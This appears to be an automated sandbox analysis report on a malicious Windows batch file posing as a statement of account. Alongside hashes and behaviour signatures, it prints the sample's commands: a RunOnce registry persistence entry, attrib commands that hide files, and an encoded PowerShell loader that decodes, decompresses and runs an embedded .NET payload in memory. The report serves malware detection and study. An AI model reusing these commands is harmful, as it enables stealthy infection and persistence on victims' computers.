Analysis
-
max time kernel
29s -
max time network
32s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
31-03-2023 07:23
Static task
static1
Behavioral task
behavioral1
Sample
SOA Feb-March 2023.bat
Resource
win7-20230220-en
General
-
Target
SOA Feb-March 2023.bat
-
Size
1.3MB
-
MD5
9f8f23997c4e07be88d8dbe835c8b6ed
-
SHA1
9f40b97b7e1605b05174a6547b9ff470511d5a1f
-
SHA256
a354101aa8c8db6f2b337ebc68571edd296d374ad8a99f79fd62d2c07321993e
-
SHA512
5c0660381331a47163f7cd4e1e87c156966dd8c068d852073429523d29e92c934f3de381a7bd8e6cf1efaf94b21864c91c620b850e93c2399ccef476d8228586
-
SSDEEP
24576:VXdQ7L0Et7plPQaneOkwJzHqOoLokXb184bQM9w5WpFapcq+14kEKaQ8wV9GtnR:KznmW1VH9w2S4QPGr
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
SOA Feb-March 2023.bat.exepid process 1920 SOA Feb-March 2023.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
SOA Feb-March 2023.bat.exepid process 1920 SOA Feb-March 2023.bat.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
SOA Feb-March 2023.bat.exepid process 1920 SOA Feb-March 2023.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
SOA Feb-March 2023.bat.exedescription pid process Token: SeDebugPrivilege 1920 SOA Feb-March 2023.bat.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.exedescription pid process target process PID 1984 wrote to memory of 1748 1984 cmd.exe reg.exe PID 1984 wrote to memory of 1748 1984 cmd.exe reg.exe PID 1984 wrote to memory of 1748 1984 cmd.exe reg.exe PID 1984 wrote to memory of 1712 1984 cmd.exe attrib.exe PID 1984 wrote to memory of 1712 1984 cmd.exe attrib.exe PID 1984 wrote to memory of 1712 1984 cmd.exe attrib.exe PID 1984 wrote to memory of 1920 1984 cmd.exe SOA Feb-March 2023.bat.exe PID 1984 wrote to memory of 1920 1984 cmd.exe SOA Feb-March 2023.bat.exe PID 1984 wrote to memory of 1920 1984 cmd.exe SOA Feb-March 2023.bat.exe PID 1984 wrote to memory of 1920 1984 cmd.exe SOA Feb-March 2023.bat.exe PID 1984 wrote to memory of 1880 1984 cmd.exe attrib.exe PID 1984 wrote to memory of 1880 1984 cmd.exe attrib.exe PID 1984 wrote to memory of 1880 1984 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1712 attrib.exe 1880 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v SOA Feb-March 2023 /d "C:\Users\Admin\AppData\Roaming\SOA Feb-March 2023.bat"2⤵
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat".exe2⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat.exe"C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAPQBKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwD0AScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat".exe2⤵
- Views/modifies file attributes
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
memory/1920-60-0x0000000001E80000-0x0000000001EC0000-memory.dmpFilesize
256KB